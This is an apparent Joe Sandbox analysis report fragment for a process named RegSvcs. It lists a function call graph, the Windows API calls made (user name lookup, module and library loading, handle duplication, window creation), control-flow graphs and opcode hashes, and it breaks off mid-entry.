GetModuleHandleW 26408->26410 26411 642fc5d GetModuleHandleW 26408->26411 26410->26409 26411->26409 26413 642d3a8 GetModuleHandleW 26412->26413 26415 642d41d 26413->26415 26416 68d3320 26415->26416 26418 68d3370 CreateWindowExW 26416->26418 26417 68d3355 26417->26358 26418->26417 26422 e90fab 26419->26422 26420 e910ce 26420->26263 26421 e90b58 2 API calls 26421->26422 26422->26420 26422->26421 26429 e9f868 26422->26429 26439 e9f878 26422->26439 26449 e910e8 26422->26449 26463 e910db 26422->26463 26477 e9f531 26422->26477 26482 e9f540 26422->26482 26430 e9f878 26429->26430 26431 e9f8d4 26430->26431 26434 e9f8ee 26430->26434 26487 e9f4f4 GetUserNameW 26431->26487 26435 e90b58 2 API calls 26434->26435 26436 e9f9a2 26435->26436 26437 e90b58 2 API calls 26436->26437 26438 e9fa06 26437->26438 26440 e9f87a 26439->26440 26441 e9f8d4 26440->26441 26444 e9f8ee 26440->26444 26488 e9f4f4 GetUserNameW 26441->26488 26445 e90b58 2 API calls 26444->26445 26446 e9f9a2 26445->26446 26447 e90b58 2 API calls 26446->26447 26448 e9fa06 26447->26448 26450 e91101 26449->26450 26451 e9111c 26450->26451 26489 e916e8 26450->26489 26452 e91124 26451->26452 26495 e9dbc8 26451->26495 26453 e9112c 26452->26453 26501 e9dd31 26452->26501 26454 e90b58 2 API calls 26453->26454 26455 e9114c 26454->26455 26456 e91178 26455->26456 26457 e90b58 2 API calls 26455->26457 26456->26422 26458 e9116c 26457->26458 26459 e90b58 2 API calls 26458->26459 26459->26456 26467 e910e0 26463->26467 26464 e91178 26464->26422 26465 e90b58 2 API calls 26466 e9116c 26465->26466 26468 e90b58 2 API calls 26466->26468 26471 e9114c 26467->26471 26472 e916e8 2 API calls 26467->26472 26473 e9111c 26467->26473 26468->26464 26469 e9112c 26470 e90b58 2 API calls 26469->26470 26470->26471 26471->26464 26471->26465 26472->26473 26474 e9dbc8 2 API calls 26473->26474 26475 e91124 26473->26475 26474->26475 26475->26469 26476 e9dd31 2 API calls 26475->26476 26476->26469 26478 e9f540 26477->26478 26479 e9f5b7 26478->26479 26507 e9f120 26478->26507 26479->26422 26483 e9f558 26482->26483 26484 e9f5b7 26483->26484 26485 e9f120 GetUserNameW 26483->26485 26484->26422 26486 e9f5a9 26485->26486 26486->26422 26490 e916ec 26489->26490 26491 e90b58 2 API calls 26490->26491 26492 e91732 26491->26492 26493 e917c4 26492->26493 26494 e90b58 2 API calls 26492->26494 26494->26492 26496 e9dbd8 26495->26496 26497 e90b58 2 API calls 26496->26497 26500 e9dc1b 26497->26500 26498 e9dc9c 26499 e90b58 2 API calls 26499->26500 26500->26498 26500->26499 26502 e9dd40 26501->26502 26503 e90b58 2 API calls 26502->26503 26506 e9dd7a 26503->26506 26504 e9de5e 26505 e90b58 GetUserNameW GetUserNameW 26505->26506 26506->26504 26506->26505 26509 e9f678 26507->26509 26508 e9f788 GetUserNameW 26510 e9f7c5 26508->26510 26509->26508 26509->26509 26511 68d3528 26512 68d354e 26511->26512 26515 68d4618 26512->26515 26516 68d4645 26515->26516 26518 68d4669 26516->26518 26519 68d426c 26516->26519 26520 68d4277 26519->26520 26521 68d5b3a CallWindowProcW 26520->26521 26522 68d5ae9 26520->26522 26521->26522 26522->26518 26523 e95a70 26524 e95a8e 26523->26524 26527 e95a04 26524->26527 26526 e95ac5 26530 e97590 LoadLibraryA 26527->26530 26529 e97689 26530->26529 26531 6423a58 26532 6423abe 26531->26532 26533 6423b6d 26532->26533 26536 6423c08 26532->26536 26539 6423c18 26532->26539 26542 64236fc 26536->26542 26540 64236fc DuplicateHandle 26539->26540 26541 6423c46 26539->26541 26540->26541 26541->26533 26543 6423c80 DuplicateHandle 26542->26543 26544 6423c46 26543->26544 26544->26533 26545 6421a78 26546 6421a7d 26545->26546 26547 6421a9b 26546->26547 26550 6421ab0 26546->26550 26555 6421a9f 26546->26555 26551 6421ac6 26550->26551 26552 6421b77 26551->26552 26560 6425690 26551->26560 26567 64256a0 26551->26567 26552->26546 26556 6421ac6 26555->26556 26557 6421b77 26556->26557 26558 6425690 2 API calls 26556->26558 26559 64256a0 2 API calls 26556->26559 26557->26546 26558->26556 26559->26556 26561 64256b8 26560->26561 26562 6425fa6 26561->26562 26574 642d733 26561->26574 26579 642d690 26561->26579 26584 642d680 26561->26584 26589 642d640 26561->26589 26562->26551 26568 64256b8 26567->26568 26569 6425fa6 26568->26569 26570 642d733 2 API calls 26568->26570 26571 642d640 2 API calls 26568->26571 26572 642d680 2 API calls 26568->26572 26573 642d690 2 API calls 26568->26573 26569->26551 26570->26568 26571->26568 26572->26568 26573->26568 26576 642d708 26574->26576 26575 642d749 26576->26575 26595 642d7a7 26576->26595 26602 642db98 26576->26602 26580 642d6ad 26579->26580 26581 642d749 26580->26581 26582 642d7a7 2 API calls 26580->26582 26583 642db98 2 API calls 26580->26583 26582->26580 26583->26580 26586 642d690 26584->26586 26585 642d749 26586->26585 26587 642d7a7 2 API calls 26586->26587 26588 642db98 2 API calls 26586->26588 26587->26586 26588->26586 26590 642d64f 26589->26590 26591 642d6ad 26589->26591 26590->26561 26592 642d749 26591->26592 26593 642d7a7 2 API calls 26591->26593 26594 642db98 2 API calls 26591->26594 26593->26591 26594->26591 26596 642db98 26595->26596 26597 642dc7b 26596->26597 26609 642ddd0 26596->26609 26623 642dcb8 26596->26623 26637 642dca5 26596->26637 26651 642dff1 26596->26651 26597->26597 26604 642dbb2 26602->26604 26603 642dc7b 26604->26603 26605 642ddd0 2 API calls 26604->26605 26606 642dff1 2 API calls 26604->26606 26607 642dca5 2 API calls 26604->26607 26608 642dcb8 2 API calls 26604->26608 26605->26604 26606->26604 26607->26604 26608->26604 26617 642dcd9 26609->26617 26610 642e020 26610->26596 26611 642e14e 26611->26596 26612 642c644 GetModuleHandleW 26614 642e234 26612->26614 26613 642e02d 26613->26611 26613->26612 26613->26614 26615 642e259 26614->26615 26672 642c70c 26614->26672 26615->26596 26617->26610 26617->26613 26618 642ddd0 2 API calls 26617->26618 26619 642dff1 2 API calls 26617->26619 26620 642dca5 2 API calls 26617->26620 26622 642dcb8 2 API calls 26617->26622 26665 642e038 26617->26665 26618->26617 26619->26617 26620->26617 26622->26617 26631 642dcd9 26623->26631 26624 642e020 26624->26596 26625 642e14e 26625->26596 26626 642c644 GetModuleHandleW 26628 642e234 26626->26628 26627 642e02d 26627->26625 26627->26626 26627->26628 26629 642e259 26628->26629 26630 642c70c LoadLibraryExW 26628->26630 26629->26596 26630->26629 26631->26624 26631->26627 26632 642ddd0 2 API calls 26631->26632 26633 642dff1 2 API calls 26631->26633 26634 642dca5 2 API calls 26631->26634 26635 642e038 2 API calls 26631->26635 26636 642dcb8 2 API calls 26631->26636 26632->26631 26633->26631 26634->26631 26635->26631 26636->26631 26638 642dcaa 26637->26638 26639 642e020 26638->26639 26642 642e02d 26638->26642 26646 642ddd0 2 API calls 26638->26646 26647 642dff1 2 API calls 26638->26647 26648 642dca5 2 API calls 26638->26648 26649 642e038 2 API calls 26638->26649 26650 642dcb8 2 API calls 26638->26650 26639->26596 26640 642e14e 26640->26596 26641 642c644 GetModuleHandleW 26643 642e234 26641->26643 26642->26640 26642->26641 26642->26643 26644 642e259 26643->26644 26645 642c70c LoadLibraryExW 26643->26645 26644->26596 26645->26644 26646->26638 26647->26638 26648->26638 26649->26638 26650->26638 26654 642dcd9 26651->26654 26652 642e020 26652->26596 26653 642e14e 26653->26596 26654->26652 26655 642e02d 26654->26655 26660 642ddd0 2 API calls 26654->26660 26661 642dff1 2 API calls 26654->26661 26662 642dca5 2 API calls 26654->26662 26663 642e038 2 API calls 26654->26663 26664 642dcb8 2 API calls 26654->26664 26655->26653 26656 642c644 GetModuleHandleW 26655->26656 26657 642e234 26655->26657 26656->26657 26658 642c70c LoadLibraryExW 26657->26658 26659 642e259 26657->26659 26658->26659 26659->26596 26660->26654 26661->26654 26662->26654 26663->26654 26664->26654 26666 642e064 26665->26666 26667 642c644 GetModuleHandleW 26666->26667 26668 642e14e 26666->26668 26669 642e234 26666->26669 26667->26669 26668->26617 26670 642e259 26669->26670 26671 642c70c LoadLibraryExW 26669->26671 26670->26617 26671->26670 26673 642e3e0 LoadLibraryExW 26672->26673 26675 642e459 26673->26675 26675->26615

                                                                                                Executed Functions

                                                                                                Function 00E9F120 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 556 e9f120-e9f6d7 558 e9f6d9-e9f704 556->558 559 e9f742-e9f746 556->559 566 e9f734 558->566 567 e9f706-e9f708 558->567 560 e9f748-e9f76b 559->560 561 e9f771-e9f77c 559->561 560->561 563 e9f788-e9f7c3 GetUserNameW 561->563 564 e9f77e-e9f786 561->564 568 e9f7cc-e9f7e2 563->568 569 e9f7c5-e9f7cb 563->569 564->563 575 e9f739-e9f73c 566->575 572 e9f72a-e9f732 567->572 573 e9f70a-e9f714 567->573 570 e9f7f8-e9f81f 568->570 571 e9f7e4-e9f7f0 568->571 569->568 582 e9f82f 570->582 583 e9f821-e9f825 570->583 571->570 572->575 578 e9f718-e9f726 573->578 579 e9f716 573->579 575->559 578->578 580 e9f728 578->580 579->578 580->572 585 e9f830 582->585 583->582 584 e9f827 583->584 584->582 585->585
                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00E9F7B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.523870829.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_e90000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameUser
                                                                                                • String ID:
                                                                                                • API String ID: 2645101109-0
                                                                                                • Opcode ID: e3167de8cecb078db8ca7d5c5f74d0ffee5bae126db12ad3dc5660b8c0516a55
                                                                                                • Instruction ID: 8e81fb13c90e025a53eb1300b46a4413965af21b673fcdef9dbb5a8f1b801d7a
                                                                                                • Opcode Fuzzy Hash: e3167de8cecb078db8ca7d5c5f74d0ffee5bae126db12ad3dc5660b8c0516a55
                                                                                                • Instruction Fuzzy Hash: 3B510374E102188FDF18CFA9C888BADBBB5BF48314F14812AE815BB355DB74A844CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0642D1C8 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 433 642d1c8-642d1d0 434 642d1db-642d1dd 433->434 435 642d1d6 call 642c644 433->435 436 642d1f3-642d1f7 434->436 437 642d1df 434->437 435->434 438 642d20b-642d24c 436->438 439 642d1f9-642d203 436->439 486 642d1e5 call 642e220 437->486 487 642d1e5 call 642ddd0 437->487 488 642d1e5 call 642dff1 437->488 489 642d1e5 call 642dca5 437->489 490 642d1e5 call 642e038 437->490 491 642d1e5 call 642dcb8 437->491 444 642d259-642d267 438->444 445 642d24e-642d256 438->445 439->438 440 642d1eb-642d1ed 440->436 441 642d328-642d3e8 440->441 481 642d3f0-642d41b GetModuleHandleW 441->481 482 642d3ea-642d3ed 441->482 446 642d28b-642d28d 444->446 447 642d269-642d26e 444->447 445->444 449 642d290-642d297 446->449 450 642d270-642d277 call 642c650 447->450 451 642d279 447->451 454 642d2a4-642d2ab 449->454 455 642d299-642d2a1 449->455 452 642d27b-642d289 450->452 451->452 452->449 458 642d2b8-642d2ba call 64244d8 454->458 459 642d2ad-642d2b5 454->459 455->454 462 642d2bf-642d2c1 458->462 459->458 464 642d2c3-642d2cb 462->464 465 642d2ce-642d2d3 462->465 464->465 466 642d2f1-642d2fe 465->466 467 642d2d5-642d2dc 465->467 474 642d300-642d31e 466->474 475 642d321-642d327 466->475 467->466 468 642d2de-642d2ee call 642aa88 call 642c660 467->468 468->466 474->475 483 642d424-642d438 481->483 484 642d41d-642d423 481->484 482->481 484->483 486->440 487->440 488->440 489->440 490->440 491->440
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.529315447.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6420000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 47e6b870c5519dcd460aad00f0f8c46d9a75485662b8a1a754fc1270145e45ff
                                                                                                • Instruction ID: 5b1d0b2b88fde176a7cafb92f7c94b4dead7896cd7572ad5965aaf060db44142
                                                                                                • Opcode Fuzzy Hash: 47e6b870c5519dcd460aad00f0f8c46d9a75485662b8a1a754fc1270145e45ff
                                                                                                • Instruction Fuzzy Hash: 357123B0A00B168FD7A4CF6AD44079ABBF1FF88204F60892AD45AD7A50D775E845CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E9F4E8 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 492 e9f4e8-e9f4f1 494 e9f4f3-e9f6d7 492->494 496 e9f6d9-e9f704 494->496 497 e9f742-e9f746 494->497 504 e9f734 496->504 505 e9f706-e9f708 496->505 498 e9f748-e9f76b 497->498 499 e9f771-e9f77c 497->499 498->499 501 e9f788-e9f7c3 GetUserNameW 499->501 502 e9f77e-e9f786 499->502 506 e9f7cc-e9f7e2 501->506 507 e9f7c5-e9f7cb 501->507 502->501 513 e9f739-e9f73c 504->513 510 e9f72a-e9f732 505->510 511 e9f70a-e9f714 505->511 508 e9f7f8-e9f81f 506->508 509 e9f7e4-e9f7f0 506->509 507->506 520 e9f82f 508->520 521 e9f821-e9f825 508->521 509->508 510->513 516 e9f718-e9f726 511->516 517 e9f716 511->517 513->497 516->516 518 e9f728 516->518 517->516 518->510 523 e9f830 520->523 521->520 522 e9f827 521->522 522->520 523->523
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.523870829.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_e90000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b85e6c3e6f7a8bb7d71bc2eaddc4d40dd4184e57a6b70975d7e5366a1ccd49f2
                                                                                                • Instruction ID: 546f7d386d1a51f7af60da5e95d01cd64b52ca3db4e1666472f732fd84b4a76d
                                                                                                • Opcode Fuzzy Hash: b85e6c3e6f7a8bb7d71bc2eaddc4d40dd4184e57a6b70975d7e5366a1ccd49f2
                                                                                                • Instruction Fuzzy Hash: D1513374E102188FDF18CFA9C894BEDBBB5BF48314F14812AE815BB355D7749844CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E9F66D Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 524 e9f66d-e9f675 525 e9f66c 524->525 526 e9f677-e9f6c7 524->526 525->524 527 e9f6c8-e9f6d7 525->527 526->527 528 e9f6d9-e9f704 527->528 529 e9f742-e9f746 527->529 536 e9f734 528->536 537 e9f706-e9f708 528->537 530 e9f748-e9f76b 529->530 531 e9f771-e9f77c 529->531 530->531 533 e9f788-e9f7c3 GetUserNameW 531->533 534 e9f77e-e9f786 531->534 538 e9f7cc-e9f7e2 533->538 539 e9f7c5-e9f7cb 533->539 534->533 545 e9f739-e9f73c 536->545 542 e9f72a-e9f732 537->542 543 e9f70a-e9f714 537->543 540 e9f7f8-e9f81f 538->540 541 e9f7e4-e9f7f0 538->541 539->538 552 e9f82f 540->552 553 e9f821-e9f825 540->553 541->540 542->545 548 e9f718-e9f726 543->548 549 e9f716 543->549 545->529 548->548 550 e9f728 548->550 549->548 550->542 555 e9f830 552->555 553->552 554 e9f827 553->554 554->552 555->555
                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00E9F7B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.523870829.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_e90000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameUser
                                                                                                • String ID:
                                                                                                • API String ID: 2645101109-0
                                                                                                • Opcode ID: 0402d7ebe40624f0c4afe868cbed06243e56d2e96f61b4a22e686d864a2d9b92
                                                                                                • Instruction ID: 92da3aca61dbebc95f5d172aa4dea2563f7459cff0866601f80a1a9c9a8fa4e8
                                                                                                • Opcode Fuzzy Hash: 0402d7ebe40624f0c4afe868cbed06243e56d2e96f61b4a22e686d864a2d9b92
                                                                                                • Instruction Fuzzy Hash: 43512374E102188FDF18CFA9D888BEEBBB5BF48314F14812AE819BB355D7749844CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E9F4F4 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 586 e9f4f4-e9f6d7 588 e9f6d9-e9f704 586->588 589 e9f742-e9f746 586->589 596 e9f734 588->596 597 e9f706-e9f708 588->597 590 e9f748-e9f76b 589->590 591 e9f771-e9f77c 589->591 590->591 593 e9f788-e9f7c3 GetUserNameW 591->593 594 e9f77e-e9f786 591->594 598 e9f7cc-e9f7e2 593->598 599 e9f7c5-e9f7cb 593->599 594->593 605 e9f739-e9f73c 596->605 602 e9f72a-e9f732 597->602 603 e9f70a-e9f714 597->603 600 e9f7f8-e9f81f 598->600 601 e9f7e4-e9f7f0 598->601 599->598 612 e9f82f 600->612 613 e9f821-e9f825 600->613 601->600 602->605 608 e9f718-e9f726 603->608 609 e9f716 603->609 605->589 608->608 610 e9f728 608->610 609->608 610->602 615 e9f830 612->615 613->612 614 e9f827 613->614 614->612 615->615
                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00E9F7B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.523870829.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_e90000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameUser
                                                                                                • String ID:
                                                                                                • API String ID: 2645101109-0
                                                                                                • Opcode ID: 1d0d8401f08c73b0874e67f7755e9904bf2b6c0a6737c6e23363ab2da0a44595
                                                                                                • Instruction ID: 55d97a82c9b239e0d9bff3efdda139d90fd6e4a81bbf028074676582c39862a1
                                                                                                • Opcode Fuzzy Hash: 1d0d8401f08c73b0874e67f7755e9904bf2b6c0a6737c6e23363ab2da0a44595
                                                                                                • Instruction Fuzzy Hash: 14510374E102188FDF18CFA9C888BADBBB5BF48314F54812AE815BB355D774A844CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 068D3370 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 616 68d3370-68d33d6 617 68d33d8-68d33de 616->617 618 68d33e1-68d33e8 616->618 617->618 619 68d33ea-68d33f0 618->619 620 68d33f3-68d3492 CreateWindowExW 618->620 619->620 622 68d349b-68d34d3 620->622 623 68d3494-68d349a 620->623 627 68d34d5-68d34d8 622->627 628 68d34e0 622->628 623->622 627->628
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068D3482
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.529636623.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_68d0000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateWindow
                                                                                                • String ID:
                                                                                                • API String ID: 716092398-0
                                                                                                • Opcode ID: ead6f5f94dabb9778501adcb766c52988313f538f6316832a79f2ddca533147d
                                                                                                • Instruction ID: b567c8f3f0353921c4cc754dc2e58f2ed2f85fd6ab77b454d93cc4eb29c19ccd
                                                                                                • Opcode Fuzzy Hash: ead6f5f94dabb9778501adcb766c52988313f538f6316832a79f2ddca533147d
                                                                                                • Instruction Fuzzy Hash: CE41EFB1D003099FDB14CF9AC984ADEFBB6BF48314F24812AE819AB210D7759885CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E97585 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 649 e97585-e975e7 650 e975e9-e9760e 649->650 651 e9763b-e97687 LoadLibraryA 649->651 650->651 656 e97610-e97612 650->656 654 e97689-e9768f 651->654 655 e97690-e976c1 651->655 654->655 661 e976d1 655->661 662 e976c3-e976c7 655->662 658 e97635-e97638 656->658 659 e97614-e9761e 656->659 658->651 663 e97620 659->663 664 e97622-e97631 659->664 667 e976d2 661->667 662->661 665 e976c9 662->665 663->664 664->664 666 e97633 664->666 665->661 666->658 667->667
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNELBASE(?), ref: 00E97677
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.523870829.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_e90000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: fcc6cf7821058c6e18aa694ef4d82f7246e39cbb422fecaae41a512df07d536a
                                                                                                • Instruction ID: c1b50f5b5573be7e3f932eb1b15ed5c9b5bcecc98a511e8e4b36747ca434a341
                                                                                                • Opcode Fuzzy Hash: fcc6cf7821058c6e18aa694ef4d82f7246e39cbb422fecaae41a512df07d536a
                                                                                                • Instruction Fuzzy Hash: 914169B0D146588FDB10CFA9C98579EBBF1EB48304F108029E859FB385D7B8984ACF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00E95A04 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 629 e95a04-e975e7 631 e975e9-e9760e 629->631 632 e9763b-e97687 LoadLibraryA 629->632 631->632 637 e97610-e97612 631->637 635 e97689-e9768f 632->635 636 e97690-e976c1 632->636 635->636 642 e976d1 636->642 643 e976c3-e976c7 636->643 639 e97635-e97638 637->639 640 e97614-e9761e 637->640 639->632 644 e97620 640->644 645 e97622-e97631 640->645 648 e976d2 642->648 643->642 646 e976c9 643->646 644->645 645->645 647 e97633 645->647 646->642 647->639 648->648
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNELBASE(?), ref: 00E97677
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.523870829.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_e90000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 57c83bd2d81cc582f7dfc58298e7e46be5f22ec20ab7f63bad52bca20318e15a
                                                                                                • Instruction ID: 1ebbbe1a8905fadb54a333a5057a4a7d3936918af4b4841560d9f6f162bc5e1b
                                                                                                • Opcode Fuzzy Hash: 57c83bd2d81cc582f7dfc58298e7e46be5f22ec20ab7f63bad52bca20318e15a
                                                                                                • Instruction Fuzzy Hash: 434156B0E146588FDB10CFA9C98579EBBF1EB48308F108029E849BB385D7B49849CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 068D426C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 668 68d426c-68d5adc 671 68d5b8c-68d5bac 668->671 672 68d5ae2-68d5ae7 668->672 678 68d5baf-68d5bbc 671->678 673 68d5ae9-68d5b20 672->673 674 68d5b3a-68d5b72 CallWindowProcW 672->674 681 68d5b29-68d5b38 673->681 682 68d5b22-68d5b28 673->682 675 68d5b7b-68d5b8a 674->675 676 68d5b74-68d5b7a 674->676 675->678 676->675 681->678 682->681
                                                                                                APIs
                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 068D5B61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.529636623.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_68d0000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallProcWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2714655100-0
                                                                                                • Opcode ID: 738c46c6f0d1dfc2155a79048ebcdfe9cbffec6009c1d0f10093df03fc7b23e0
                                                                                                • Instruction ID: 0eeb83eab3e014950448abbc44225b993a3f233ce5f61744e9c4660e04898487
                                                                                                • Opcode Fuzzy Hash: 738c46c6f0d1dfc2155a79048ebcdfe9cbffec6009c1d0f10093df03fc7b23e0
                                                                                                • Instruction Fuzzy Hash: 34413BB89003098FDB54CF59C888AAEBBF5FF88314F24C459D519AB361D775A841CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06423C78 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1306 6423c78-6423d14 DuplicateHandle 1307 6423d16-6423d1c 1306->1307 1308 6423d1d-6423d3a 1306->1308 1307->1308
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06423C46,?,?,?,?,?), ref: 06423D07
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.529315447.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6420000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 68327846264841dc16b7f67ba0994c1bb01c0190b39995a2af37dea4740adf24
                                                                                                • Instruction ID: 0d3f83130d5f09c2cd48257077348924064bbfd0fd00efc58e30357f777fe061
                                                                                                • Opcode Fuzzy Hash: 68327846264841dc16b7f67ba0994c1bb01c0190b39995a2af37dea4740adf24
                                                                                                • Instruction Fuzzy Hash: 9A2107B59002199FDB10CF9AD984ADEBFF9EB48324F24841AE854A7350D3789944CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 064236FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1311 64236fc-6423d14 DuplicateHandle 1313 6423d16-6423d1c 1311->1313 1314 6423d1d-6423d3a 1311->1314 1313->1314
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06423C46,?,?,?,?,?), ref: 06423D07
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.529315447.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6420000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 8c6c30997af4d59f257c31b999da1a5c85f21769415221a70608c911c0402d19
                                                                                                • Instruction ID: 7445478bfe5ee5bdf2702673bba659cb99111748f89ad862847c077f2b8c1d83
                                                                                                • Opcode Fuzzy Hash: 8c6c30997af4d59f257c31b999da1a5c85f21769415221a70608c911c0402d19
                                                                                                • Instruction Fuzzy Hash: 982116B5D002199FDB10CF9AD984AEEBFF5EB48324F64841AE914B7310D378A944CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0642E3D8 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
